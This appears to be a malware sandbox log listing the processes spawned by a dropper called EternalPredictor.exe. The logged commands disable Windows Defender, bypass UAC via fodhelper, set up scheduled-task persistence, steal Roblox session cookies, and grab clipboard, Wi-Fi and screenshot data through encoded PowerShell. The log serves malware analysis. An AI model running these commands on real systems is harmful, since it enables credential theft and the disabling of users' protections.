                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6092 324 0000019985E22B80
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\XClient.exe "C:\Users\user\AppData\Roaming\XClient.exe"
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\eternal.exe "C:\Users\user\AppData\Roaming\eternal.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\skuld.exe "C:\Users\user\AppData\Roaming\skuld.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\skuld.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUIDJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Users\user\AppData\Roaming\program.exe "C:\Users\user\AppData\Roaming\program.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6092 324 0000019985E22B80Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\program.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C fodhelper
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP"
                        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe "C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
